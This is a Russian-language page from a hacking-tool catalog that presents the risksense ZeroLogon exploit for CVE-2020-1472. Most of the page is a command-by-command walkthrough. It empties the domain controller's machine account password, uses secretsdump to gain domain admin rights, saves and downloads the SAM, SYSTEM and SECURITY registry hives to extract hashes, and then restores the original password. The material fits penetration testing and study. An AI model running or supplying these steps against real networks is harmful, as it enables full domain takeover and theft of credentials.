Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
zerologon — Эксплойт для zerologon cve-2020-1472 | Kitploit
Инструменты/GitHubGitHub/risksense/zerologon
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияТестирование на Проникновение
GitHubrisksense/zerologon

zerologon

Эксплойт для zerologon cve-2020-1472

Репозиторий
7041465 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт ZeroLogon

Код эксплойта основан на https://www.secura.com/blog/zero-logon и https://github.com/SecuraBV/CVE-2020-1472. Оригинальное исследование и сканер от Secura, модификации от RiskSense Inc.

Для эксплуатации удалите все предыдущие установки Impacket и установите Impacket из https://github.com/SecureAuthCorp/impacket/commit/b867b21 или новее. Затем выполните:

root@kitploit:~
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Если это успешно, вы затем сможете:

root@kitploit:~
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

что должно дать вам права администратора домена. После этого используйте wmiexec.py для доступа к целевому контроллеру домена с учетными данными из secretsdump и выполните

root@kitploit:~
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

Затем вы можете

root@kitploit:~
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

И это должно показать вам исходный NT-хеш учетной записи компьютера. Затем вы можете восстановить этот исходный хеш учетной записи компьютера в домене с помощью

root@kitploit:~
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Восстановление исходного хеша необходимо для нормальной работы контроллера домена.

Скачать инструмент